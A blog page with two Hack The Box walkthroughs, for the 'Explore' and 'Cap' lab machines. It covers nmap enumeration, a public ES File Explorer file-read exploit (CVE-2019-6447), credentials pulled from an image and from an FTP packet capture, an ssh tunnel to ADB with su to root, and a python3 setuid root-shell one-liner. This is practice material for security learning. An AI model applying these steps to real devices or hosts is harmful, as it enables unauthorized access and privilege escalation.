The Dark Tech

The Dark Tech

HTB

Explore HTB Walkthrough

By Leave a Comment

Enumeration

Nmap Scan

# Nmap 7.91 scan initiated Fri Oct 22 14:03:27 2021 as: nmap -A -sC -sV -p- -O -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.18s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   185.07 ms 10.10.14.1
2   185.28 ms 10.10.10.247

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 22 14:08:39 2021 -- 1 IP address (1 host up) scanned in 311.53 seconds

So here we have a ssh port running on 2222 a filtered ADB port on 5555 and two http ports on 42135 and 59777 so lets check the http first

port 42135 returns a error Not Found

while the 59777 returns the forbidden error

Foothold

So lets check for the ES file explorer vulnerability after searching on google for ES file explorer open port vulnerability you can see a exploitdb post on Arbitary File Read

https://www.exploit-db.com/exploits/50070

so just get that payload and save it locally

by listing for the pictures you can see a creds.jpg

└─# python3 exploit.py listPics 10.10.10.247 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

So lets go ahead and download it

└─# python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg                                  1 ⨯

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

User

Now the script will save the data in file out.dat so just rename it to creds.jpg

and here you can see the image with ssh credentials in it

kristi:[email protected]!

└─# ssh [email protected] -p 2222                                                           
Password authentication
Password: 
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ whoami
u0_a76
2|:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt 
Android Download Music  Pictures      Ringtones dianxinos 
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

And here we got the User flag

Root

As we sow earlier there wa port 5555 filtered wich is basically used for adb in android so lets create a ssh tnnel to forward it to our machine

sh [email protected] -p 2222 -L 5555:127.0.0.1:5555   
Password authentication
Password: 
:/ $

This will create the ssh tunnel to forward 5555 port to our machine now lets connect using adb

adb connect 127.0.0.1:5555

after a successful connection you can see the device by doing

adb devices

now for interacting with shell use

└─# adb -s 127.0.0.1:5555 shell
x86_64:/ $ id                                                                                                      
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su

:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # whoami
root
:/ # cat /data/root.txt
f04fc82b6d49b41c9b08982be59338c5
:/ #

Remember we used SU to switch to root from shell

Rooted..!!!

Cap Htb Walkthrough

By Leave a Comment

Enumeration

Nmap Scan

Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:21 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:14 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 01 Oct 2021 13:19:15 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   186.65 ms 10.10.14.1
2   186.72 ms 10.10.10.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.38 seconds

In the above nmap scan report you can see that we have 21,22,80 ports open For ftp the anonymous login is not enabled nither default credentials works so we will proceed further with the http port.

User

If you navigate on the http page you can see the dashboard directly logged in with Nathan user

When You navigate to the **security snapshot ** you can see that you are able to download a packet capture files in the url bar if you change the url (end of the url which has a single digit) you can see the different packet counts so we will download the one with most packets. you will find it on

http://10.10.10.245/data/0

we will download the pcap file and open it in wireshark. Where we can see the ftp traffic. Which is basically a ftp session and as ftp has no encryption while transfering data you can see the password in plain text. so lets follow one of the ftp stream.

USER nathan
PASS Buck3tH4TF0RM3!

you can use these credentials to log in the ssh as user nathan

└─# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 2.0

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Oct  1 14:14:56 2021 from 10.10.16.17
[email protected]:~$

Root

Here the sudo is not avalible of any of the file and there are no any ports filtered by firewall. so we will check for capablities using this command

[email protected]:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

so now we can see that setuid is avalible for python so we can use following payload for geting the root access using python3

[email protected]:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
[email protected]:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
[email protected]:~#

And we got the root access